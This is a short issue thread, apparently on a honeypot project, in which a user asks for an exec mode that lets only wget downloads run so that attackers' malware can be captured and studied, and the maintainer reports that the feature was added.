Question about a possible feature

Question

Question about a possible feature

mchaos opened this issue 9 years ago · 2 comments

I have found my own rudimentary way of doing this. So I am sure you are aware that allowing exec remote commands results in a bunch of malware running on the server within an hour typically. This causes me to weed it out, which is not hard, but time consuming, and constant. I still would like to capture the malware for dissection and execution in a vm to figure out how to remove and defend against.

There should be a way to enable exec however only letting the wget command to pass through, and the rest recorded to log but not actually executed. This would allow anyone to collect malware in the wild to see what is out there.

It would also make it very easy to find where the buggers are connecting to.

I'd love to see this. For now I have a quick and dirty way on the server it's self to make it so over exec connections the malware will be downloaded but that's it.

Answer 1 · 2016-01-07T20:47:49.000Z

Nice idea, I'll add it to the list

Answer 2 · 2016-01-26T06:35:52.000Z

Added in the latest release